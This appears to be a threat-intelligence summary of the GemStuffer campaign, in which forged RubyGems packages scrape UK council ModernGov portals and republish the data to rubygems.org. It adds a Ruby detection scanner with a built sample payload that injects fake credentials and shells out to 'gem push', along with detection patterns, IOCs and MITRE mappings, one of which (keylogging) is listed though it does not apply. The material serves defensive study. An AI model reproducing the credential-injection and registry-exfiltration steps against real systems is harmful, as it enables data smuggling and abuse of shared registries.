GemStuffer Campaign Abuses RubyGems as Exfiltration Channel Targeting UK Local Government

Socket’s threat research team is tracking GemStuffer, a suspicious RubyGems campaign that uses public UK council ModernGov portals as a data transport layer and republishes scraped content inside more than 100 forged gems. The activity overlaps with a broader RubyGems spam-publishing incident and involves hardcoded API keys, temporary credential injection, and direct pushes to rubygems.org. #GemStuffer #RubyGems #ModernGov #Lambeth #Wandsworth #Southwark

Key points

  • GemStuffer involves 155 package artifacts, with more than 100 RubyGems packages and versions used in the campaign.
  • The packages scrape public council portal content from ModernGov sites used by Lambeth, Wandsworth, and Southwark.
  • Collected responses are packaged into valid .gem archives and published back to RubyGems, effectively using the registry as a storage and transport layer.
  • Some samples build gems locally under /tmp, inject fabricated RubyGems credentials, and push via the gem CLI; others POST archives directly to the RubyGems API.
  • Ruby Central described the wider activity as a coordinated spam-publishing campaign tied to newly registered accounts, with no compromise of existing packages.
  • RubyGems temporarily disabled new account registration and throttled webhooks while improving spam detection; existing accounts and installs were unaffected.
  • The observed abuse pattern includes low download counts, repetitive package generation, hardcoded API keys, and scraped data embedded inside package archives.
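The abuse pattern listed above (hardcoded `rubygems_` keys, ModernGov targets, shell-outs to `gem push`, scraped data stowed under `lib/`) can be turned into a static check on the `data.tar.gz` layer of a `.gem` archive. The following is an added example, not code from Socket or the write-up; the rules, the 64 KiB bulk threshold, and the constructed sample payload (with a fake placeholder key) are this example's assumptions.

```ruby
require "rubygems/package"
require "zlib"
require "stringio"

# Heuristics derived from the GemStuffer write-up. Regexes and the size
# threshold are assumptions made for this example, not Socket's rules.
RULES = {
  hardcoded_api_key: /rubygems_[0-9a-f]{10,}/i,
  moderngov_target:  %r{https?://(moderngov|democracy)\.[a-z]+\.gov\.uk}i,
  gem_push_shellout: /`[^`]*gem\s+push[^`]*`/,
  credential_write:  %r{\.gem/credentials},
}.freeze
BULK_DATA_BYTES = 64 * 1024 # assumed: a .txt under lib/ above this is data, not code

# Walk every file entry of a gem's data.tar.gz payload (the file tree shipped
# inside the .gem) and return [[path, rule_name], ...] for each indicator hit.
def scan_data_tar_gz(gz_bytes)
  findings = []
  Zlib::GzipReader.wrap(StringIO.new(gz_bytes)) do |gz|
    Gem::Package::TarReader.new(gz) do |tar|
      tar.each do |entry|
        next unless entry.file?
        path, body = entry.full_name, entry.read.to_s
        RULES.each { |name, re| findings << [path, name] if body.match?(re) }
        if path.start_with?("lib/") && path.end_with?(".txt") && body.bytesize > BULK_DATA_BYTES
          findings << [path, :bulk_text_in_lib]
        end
      end
    end
  end
  findings
end

# Constructed sample payload that mimics the reported pattern: a script that
# writes a (fake, placeholder) key to .gem/credentials, fetches a ModernGov
# calendar page, shells out to `gem push`, and ships scraped HTML in lib/.
def sample_payload
  io = StringIO.new
  Gem::Package::TarWriter.new(io) do |tar|
    tar.add_file("payload.rb", 0o644) do |f|
      f.write <<~RUBY
        File.write(ENV["HOME"] + "/.gem/credentials", "rubygems_deadbeefdeadbeef00")
        open("https://moderngov.lambeth.gov.uk/mgCalendarMonthView.aspx")
        `gem push lambeth71b-0.0.2.gem --host https://rubygems.org`
      RUBY
    end
    tar.add_file("lib/result.txt", 0o644) { |f| f.write("<html>" * 20_000) }
  end
  Zlib.gzip(io.string)
end
```

To check a real archive, extract `data.tar.gz` from the outer tar of the `.gem` (a plain tar) and pass its bytes to `scan_data_tar_gz`; a clean gem yields an empty list.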

MITRE Techniques

  • [T1589.002] Gather Victim Identity Information: Organizational – The scripts enumerate UK local government portals and collect council meeting content from Lambeth, Wandsworth, and Southwark. [‘The campaign focuses on public-facing ModernGov portals used by Lambeth, Wandsworth, and Southwark’]
  • [T1213] Data from Information Repositories – The malware scrapes public council calendar pages, agenda listings, committee links, and related meeting content from web portals. [‘It fetches council calendar pages and then actively crawls extracted links for additional document content’]
  • [T1041] Exfiltration Over C2 Channel – Scraped data is embedded into .gem packages and pushed to RubyGems for later retrieval. [‘Wrap it in a package, push it to a public registry, and retrieve it later with ordinary package tooling’]
  • [T1078] Valid Accounts – The campaign uses hardcoded RubyGems API keys and fabricated credentials to authenticate publishing actions. [‘Write hardcoded API key → .gem/credentials’, ‘The API key in the Authorization header is the only authentication material in the request’]
  • [T1027] Obfuscated Files or Information – The stolen content is stored inside compressed gem archive structures and gzip/tar layers. [‘The data is gzip-compressed inside a tar archive inside a TLS session’]
  • [T1105] Ingress Tool Transfer – The attacker transfers packaged data into the RubyGems registry by uploading .gem files. [‘gem push .gem --host https://rubygems.org’]
  • [T1059.004] Command and Scripting Interpreter: Unix Shell – The samples use shell-out backticks to execute gem build and gem push commands. [‘gem build x.gemspec’, ‘gem push lambeth71b-0.0.2.gem --host https://rubygems.org’]
  • [T1056.001] Input Capture: Keylogging – The article does not describe keylogging; no relevant use of this technique is evidenced. [‘No credential capture from user input is described’]
  • [T1567.002] Exfiltration to Cloud Storage – The campaign uses RubyGems as a public storage layer to host stolen data. [‘RubyGems is being used as a public data drop for scraped council content’]

Indicators of Compromise

  • [Domains] Targeted council portals and registry endpoints – moderngov.lambeth.gov.uk, democracy.wandsworth.gov.uk, and moderngov.southwark.gov.uk
  • [URLs] Calendar scraping endpoints – https://moderngov.lambeth.gov.uk/mgCalendarMonthView.aspx?M=1&Y=2026&GL=1&bcr=1, https://democracy.wandsworth.gov.uk/mgCalendarMonthView.aspx?M=1&Y=2026&GL=1&bcr=1
  • [File names] Malicious package and staging artifacts – payload.rb, script.rb, evil.rb, and lib/result.txt
  • [File paths] Temporary staging and credential locations – /tmp/gemhome/.gem/credentials, /tmp//lib/result.txt, and /tmp/rubydocran_*
  • [API keys] RubyGems publishing credentials – rubygems_9feada…[REDACTED]…054a57, rubygems_fb4e1b…[REDACTED]…aec9dd, and rubygems_d8e875…[REDACTED]…03a533
  • [Hashes] Example file hashes for dropped scripts – payload.rb SHA-256 239440c830e17530dda0a8a06ed2708860998750a1e3ed2239e919465dc59420, script.rb SHA-256 c2d6bcacc88177e0f2c8c262726f86f37e671b1692c8bc135bac4b610ddcf31a
  • [Package names] Representative malicious gems – lambeth71b, agenda-sample-result, and other repeated junk-like package names

Read more: https://socket.dev/blog/gemstuffer